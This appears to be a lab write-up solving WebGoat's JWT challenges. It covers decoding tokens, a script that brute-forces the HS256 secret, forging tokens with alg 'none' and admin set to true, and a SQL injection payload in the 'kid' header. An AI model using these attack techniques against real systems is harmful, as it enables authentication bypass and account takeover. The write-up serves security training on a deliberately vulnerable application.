JWT Token

3/

Use jwt.io to decode token, you will get username.

5/

After decode, you will see algorithm is HS256 and admin is false.

First, edit alg to "none". Next edit admin value to "true"

Edit cookie and send:

8/

eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDE1MDk3MiwiZXhwIjoxNjQwMTUxMDMyLCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.dlRNogwJ7D5mrP2ZvXlG5LW1d1U-vqq4DNld1EeN-FA

First, we must to find key of this token, after that change the username field in this token to 'WebGoat' to solve this challenge (The algorithm is HS256).

I use 1000000-password-seclists.txt to brute force.

Code to find key:

import jwt
jwt_str = R'eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDEzOTY5NywiZXhwIjoxNjQwMTM5NzU3LCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.1XUCWT94XEVfGV1OBGV4cLMJhqCMbzWzZI39I01Exmc'
with open('1000000-password-seclists.txt') as f:
    for line in f:
        key = line.strip()
        try:
            jwt.decode(jwt_str, key, algorithms='HS256')
            print('Key found : ',key)
            break
        except jwt.exceptions.ExpiredSignatureError:
            print('Key found : ',key)
            break
        except jwt.exceptions.InvalidSignatureError:
            continue
    else:
        print("No key found.")

I found that the key is victory, use this key to decode and change username to WebGoat:

And then when We submit we will receive message that the jwt token is expired:

Change exp value and submit token again, we will solve this challenge:

10/

This challenge is similar to challenge 5.

Go to file logs.txt, we will get token:

Modify request with Burpsuite, we will see Authorization header:

We will edit the token we got and then use it to set value for Authorization header:

The algorithm is "None":

Edit admin field to "true":

Send request with new token, we will solve the challenge:

11/

First, use jwt.io to decode:

In header, you will see "kid", It seems different from other challenges.

Take a look at source code in WebGoat's github:

Here we can see, the key will be selected from the database where id=kid. We can use SQLI to make it return your own key:

Some thing we can use like this:

' union select 'key' from INFORMATION_SCHEMA.SYSTEM_USERS; --

When the query is executed, the key use to encode jwt is 'key' (your own key).

But one more step, you can see, before use this value as a key for jwt, it must be base64 decode first:

TextCodec.BASE64.decode(rs.getString(1));

So we must edit the value for kid o to:

' union select 'a2V5' from INFORMATION_SCHEMA.SYSTEM_USERS; --

And finally, edit username to "Tom", delete exp and use 'key' as key:

Submit new token and solve the challenge: